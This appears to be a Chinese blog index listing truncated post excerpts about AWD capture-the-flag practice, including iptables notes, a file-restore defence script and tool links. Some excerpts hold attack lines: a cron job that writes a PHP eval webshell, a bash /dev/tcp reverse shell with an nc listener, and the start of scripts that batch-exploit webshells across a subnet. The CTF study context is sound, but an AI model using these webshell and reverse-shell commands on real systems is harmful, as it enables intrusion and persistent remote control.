摘要: #coding=utf-8 import requests url_head="http://10.1.10." #网段 url="" shell_addr="/public/.user_config.php" #木马路径 password="cmd" #木马密码 #port="80" payloa 阅读全文
posted @ 2022-12-06 15:43 Cloud_strife 阅读(30) 评论(0) 推荐(0) 编辑
摘要: */2 * * * * /bin/echo '<?php eval(@$_POST['password']);?>' > /www/admin/localhost_80/wwwroot/DVWA-master/hackable/uploads/shell.php 1.使用命令crontab -e进入 阅读全文
posted @ 2022-12-06 15:42 Cloud_strife 阅读(89) 评论(0) 推荐(0) 编辑
摘要: 1、nc反弹在靶机在执行 ,xx.xx.xx是你本机的ip地址bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1在本机上执行nc -lvnp 8000就可以收到反弹过来的shell了2、nc采用base64编码反弹首先把这个语句进行base64编码,192.168.1.1是 阅读全文
posted @ 2022-12-06 14:57 Cloud_strife 阅读(122) 评论(0) 推荐(0) 编辑
摘要: 1 #-*- coding:utf-8 -*- 2 import paramiko 3 import threading 4 import queue 5 6 #反弹shell python 7 q=queue.Queue() 8 #lock = threading.Lock() 9 10 #pri 阅读全文
posted @ 2022-12-06 14:54 Cloud_strife 阅读(519) 评论(0) 推荐(0) 编辑
摘要: #-*- coding:utf-8 -*- # coding:utf-8 import paramiko ip = '10.1.1.1' port = '22' username = 'ctf' passwd = 'ctf' #private_key_path = '/home/auto/.ssh/ 阅读全文
posted @ 2022-12-06 14:47 Cloud_strife 阅读(665) 评论(0) 推荐(0) 编辑
摘要: # -*- coding: utf-8 -*- #use: python file_check.py ./ # 放在 /var/www/ 或 /var/www/html 下执行这个脚本,它会先备份当然目录下的所有文件,然后监控当前目录, # 一旦当前目录下的某个文件发生变更,就会自动还原,有新的文件 阅读全文
posted @ 2022-12-06 14:23 Cloud_strife 阅读(46) 评论(0) 推荐(0) 编辑
摘要: 在Linux中,可以通过三种方式在一行中运行多个命令,外加一个管道操作命令:1 执行多个命令,前一个命令执行成功,才执行后一个命令。 在多个命令中使用 && 符号,主要用于多个命令之间,必须是前一个命令执行成功,接着才会执行后一个命令,不管命令有多少个都是按这种规则去执行的。 例如 cd proj 阅读全文
posted @ 2022-12-06 14:21 Cloud_strife 阅读(2096) 评论(0) 推荐(0) 编辑
摘要: 整理的一些关于iptables和firewall防火墙的命令,做参考 这是iptables的默认防火墙配置文件在/etc/sysconfig/iptables中 iptables -L -n 显示所有防火墙规则service iptables restart 重启防火墙service iptable 阅读全文
posted @ 2022-12-05 20:52 Cloud_strife 阅读(444) 评论(0) 推荐(0) 编辑
摘要: 前阵子在准备AWD比赛,找了一些资料,基本都是网上的,做了简单的集合。可以做个 总结。 AWD基本资料 登录服务器: 攻击流程:信息搜集、网站目录扫描、攻击服务端口、攻击WEB服务、权限提升、权限维持 防御流程: 网站备份、数据库备份、信息搜集、 安全加固(更改口令,备份检查,后门查杀、关闭进程、关 阅读全文
posted @ 2022-12-05 20:50 Cloud_strife 阅读(356) 评论(0) 推荐(0) 编辑
摘要: web渗透中,常会用到的网站 网站导航 编码/加密CyberChef:编解码及加密,可本地部署 https://github.com/gchq/CyberChefOK Tools在线工具:https://github.com/wangyiwy/oktoolsCTF在线工具:http://www.hi 阅读全文
posted @ 2022-12-05 20:49 Cloud_strife 阅读(848) 评论(0) 推荐(0) 编辑